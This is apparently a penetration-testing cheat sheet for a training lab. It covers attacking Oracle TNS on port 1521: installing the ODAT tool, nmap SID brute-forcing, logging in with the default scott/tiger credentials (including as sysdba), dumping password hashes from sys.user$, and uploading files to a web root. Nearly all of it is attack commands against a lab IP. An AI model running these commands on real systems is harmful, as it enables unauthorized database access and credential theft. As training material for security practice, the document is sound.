Oracle TNS (1521)

Oracle-Tools-setup.sh

Oracle-Tools-setup.sh

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien python3-pip -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
sudo submodule update
sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

Testing ODAT (Oracle Database Attacking Tool)

./odat.py -h

Footprinting using NMAP

sudo nmap -p1521 -sV 10.129.204.235 --open

SID (System Identifier)

• unique name that identifies a particular database instance

• essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to

• If the client specifies an incorrect SID, the connection attempt will fail.

Bruteforcing SID using NMAP

sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

ODAT (run all modules i.e. brute sid and user/pass)

./odat.py all -s 10.129.204.235

Logging in using SQLPlus

sqlplus scott/tiger@10.129.204.235/XE;

Logging in using SQLPlus as sysdba (if user has appropriate privs)

sqlplus scott/tiger@10.129.204.235/XE as sysdba

If SQLPlus shows error about libsqlplus.so

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig

Oracle RDBMS Commands

select table_name from all_tables;
select * from user_role_privs;

Oracle RDBMS Extracting Password Hashes

select name, password from sys.user$

Oracle RDBMS file upload (INTO OUTFILE)

$ echo "Oracle File Upload Test" > testing.txt
$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
$ curl -X GET http://10.129.204.235/testing.txt

• /var/www/html for linux

• C:\inetpub\wwwroot for windows

• Try this only if there is a webserver